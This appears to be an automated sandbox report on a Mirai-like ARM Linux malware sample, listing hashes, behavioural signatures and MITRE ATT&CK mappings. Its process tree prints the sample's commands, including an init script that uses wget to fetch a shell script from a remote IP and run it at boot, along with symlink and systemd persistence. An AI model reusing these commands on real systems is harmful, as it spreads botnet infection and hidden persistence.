Analysis
-
max time kernel
149s -
max time network
155s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
25/11/2024, 02:39
Static task
static1
Behavioral task
behavioral1
Sample
871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf
Resource
debian9-armhf-20240611-en
General
-
Target
871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf
-
Size
109KB
-
MD5
e24a9404e3d31d669d6f86c8024e5e72
-
SHA1
3f5b41ed4ea8db7ef43b04a5aebfef0e06442e7e
-
SHA256
871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45
-
SHA512
20929f46483b6321809f95a41a6afe0b19d52dd6519e65a65e36361569dd33410c0db7844db4571e4d266177160b1de99da1e8822cd96784a1ca91f761eb7acc
-
SSDEEP
3072:a3q1v2+7eYYOpq22URk0bEAgks32wGPOFnnbC:a3xGtqfUR1IAgksGLPt
Malware Config
Signatures
-
Contacts a large (13786) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 3 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 683 sh 685 sh 687 chmod -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for modification /dev/misc/watchdog 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf -
Unexpected DNS network traffic destination 64 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 Destination IP 155.4.107.14 -
Checks mountinfo of local process 1 TTPs 1 IoCs
Checks mountinfo of running processes which indicate if it is running in chroot jail.
description ioc Process File opened for reading /proc/677/mountinfo 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf -
Creates/modifies environment variables 1 TTPs 1 IoCs
Creating/modifying environment variables is a common persistence mechanism.
description ioc Process File opened for modification /etc/profile 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf -
Enumerates running processes
Discovers information about currently running processes on the system
-
description ioc Process File opened for modification /etc/init.d/system 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for modification /etc/init.d/sh sh -
Modifies rc script 2 TTPs 1 IoCs
Adding/modifying system rc scripts is a common persistence mechanism.
description ioc Process File opened for modification /etc/rc.local 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf -
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc Process File opened for modification /etc/systemd/system/custom.service 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf -
Modifies Bash startup script 2 TTPs 1 IoCs
description ioc Process File opened for modification /etc/profile 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf -
Changes its process name 24 IoCs
description pid Process Changes the process name, possibly in an attempt to hide itself 654 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf Changes the process name, possibly in an attempt to hide itself 698 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf Changes the process name, possibly in an attempt to hide itself 698 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf Changes the process name, possibly in an attempt to hide itself 698 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf Changes the process name, possibly in an attempt to hide itself 698 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf Changes the process name, possibly in an attempt to hide itself 698 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf Changes the process name, possibly in an attempt to hide itself 698 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf Changes the process name, possibly in an attempt to hide itself 698 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf Changes the process name, possibly in an attempt to hide itself 698 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf Changes the process name, possibly in an attempt to hide itself 698 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf Changes the process name, possibly in an attempt to hide itself 698 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf Changes the process name, possibly in an attempt to hide itself 698 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf Changes the process name, possibly in an attempt to hide itself 698 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf Changes the process name, possibly in an attempt to hide itself 698 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf Changes the process name, possibly in an attempt to hide itself 698 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf Changes the process name, possibly in an attempt to hide itself 698 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf Changes the process name, possibly in an attempt to hide itself 698 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf Changes the process name, possibly in an attempt to hide itself 698 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf Changes the process name, possibly in an attempt to hide itself 698 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf Changes the process name, possibly in an attempt to hide itself 698 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf Changes the process name, possibly in an attempt to hide itself 698 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf Changes the process name, possibly in an attempt to hide itself 698 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf Changes the process name, possibly in an attempt to hide itself 698 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf Changes the process name, possibly in an attempt to hide itself 698 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf -
Enumerates kernel/hardware configuration 1 TTPs 1 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
description ioc Process File opened for reading /proc/749/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/753/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/784/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/714/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/728/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/741/cmdline 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/777/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/698/cmdline 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/705/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/720/cmdline 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/794/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/724/cmdline 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/752/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/763/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/695/cmdline 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/715/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/773/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/718/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/727/cmdline 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/742/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/779/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/791/cmdline 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/733/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/762/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/703/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/712/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/755/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/776/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/706/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/716/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/722/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/729/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/781/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/cmdline systemctl File opened for reading /proc/668/cmdline 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/740/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/772/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/791/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/720/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/729/cmdline 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/736/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/746/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/765/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/739/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/754/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/663/cmdline 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/748/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/790/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/726/cmdline 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/785/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/2/cmdline 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/723/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/730/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/759/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/782/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/728/cmdline 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/731/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/744/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/745/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/763/cmdline 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/735/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/708/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/734/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf File opened for reading /proc/761/status 871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf
Processes
-
/tmp/871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf/tmp/871d2e4508e10b771241c3771b78943d6447e286fe0dccfd25e04441ab569b45.elf1⤵
- Modifies Watchdog functionality
- Checks mountinfo of local process
- Creates/modifies environment variables
- Modifies init.d
- Modifies rc script
- Modifies systemd
- Modifies Bash startup script
- Changes its process name
- Reads runtime system information
PID:654 -
/bin/shsh -c "systemctl enable custom.service >/dev/null 2>&1"2⤵PID:656
-
/bin/systemctlsystemctl enable custom.service3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:666
-
-
-
/bin/shsh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"2⤵PID:678
-
/bin/lnln -s /etc/init.d/system /etc/rcS.d/S99system3⤵PID:680
-
-
-
/bin/shsh -c "echo \"#!/bin/sh # /etc/init.d/sh case \\\"\$1\\\" in start) echo 'Starting sh' /bin/sh & wget http://193.143.1.70/ -O /tmp/lol.sh chmod +x /tmp/lol.sh /tmp/lol.sh & ;; stop) echo 'Stopping sh' killall sh ;; restart) \$0 stop \$0 start ;; *) echo \\\"Usage: \$0 {start|stop|restart}\\\" exit 1 ;; esac exit 0\" > /etc/init.d/sh"2⤵
- File and Directory Permissions Modification
- Modifies init.d
PID:683
-
-
/bin/shsh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"2⤵
- File and Directory Permissions Modification
PID:685 -
/bin/chmodchmod +x /etc/init.d/sh3⤵
- File and Directory Permissions Modification
PID:687
-
-
-
/bin/shsh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"2⤵PID:689
-
/bin/mkdirmkdir -p /etc/rc.d3⤵PID:691
-
-
-
/bin/shsh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"2⤵PID:694
-
/bin/lnln -s /etc/init.d/sh /etc/rc.d/S99sh3⤵PID:696
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
4XDG Autostart Entries
1Boot or Logon Initialization Scripts
2RC Scripts
2Create or Modify System Process
1Systemd Service
1Event Triggered Execution
1Unix Shell Configuration Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Privilege Escalation
Boot or Logon Autostart Execution
4XDG Autostart Entries
1Boot or Logon Initialization Scripts
2RC Scripts
2Create or Modify System Process
1Systemd Service
1Event Triggered Execution
1Unix Shell Configuration Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
109B
MD5735cae7d3cbab0f59d95f84790282103
SHA11cb77931b3097f18988016c9ceba3280a5ccb2ae
SHA256dfdd4cf729384e4ed52516ab72bd86be286c80f53d4f5b764fd2dd2a2b2c983b
SHA512998daa467c4ee63dd41515897728de70cbb9c579ca8b16c26d8e6db5edad53c6dbd6343fb10eda3dbc29b0cb1fa72a9b2653250e9027e6ee02d17726e958bbfe
-
Filesize
353B
MD5c5583b6a699f62cb0a004c99842f5c70
SHA1b232ef89bf9b36643b5956aaacfd295b9ce2a0a7
SHA2562b03c83558e4af71f3b35408cf668a2ee06931c21adec760952a21a11bc4c59b
SHA512a9fc1e4c30452a3d100a8ccfbb707d9d323830fbbca90c98d3c126bf943539baaf1fccb04d435a4b627ed7f1bfb1bbd649dab282488d951dde87e097423e154d
-
Filesize
96B
MD5f000251d92c773cc3ee1ca22cf5f0788
SHA1e2386fe6a5f29b1e9e5ad5b38928c024f97105e6
SHA25631a77745dd3724a0691a9255738b9c87516868932e3eb992e2afafcd0574a985
SHA5120dad5adaa7742dd208596fefad53ab21c39fbf2cbe5c9958b92170d555d316f0a0b02ec5236311b869aa18e90592e81439a3a229bf1307b5daf87d87c5f493c2
-
Filesize
101B
MD53d6b6e1b05ad5d0538ccd8804bcd279b
SHA10fc061b51c225d5bea072c939de05e8a856558bc
SHA256cab2df9c1c498df29445837610f14ae08d4af98d3acac69b0581c01fe594e3c5
SHA5121957857cffbc0d526eb04e40db166d661b9dc59fc31fb5551f31cd58d270f839ffa2098e81c8555b12e9dbd55ba17df662b14c6441a6389eb9a76082fa401c98
-
Filesize
290B
MD519a440fdac7f578f2fb33719698a082c
SHA1ebadce21c65d05ad62a324deb39c57aecd3edf2c
SHA256b176d41b748466f8ba35246c78a1c940f65403b363c086ccd5b5de577a87cf69
SHA5128bdfac90e7235fc35eeec141a1e2145ed4ea5a250b71bdf0cf0e5e5aa59ab6dc004dc08561bd5547c4a4a106138c98950dc2098c905ce785b9b2c0657684d7bb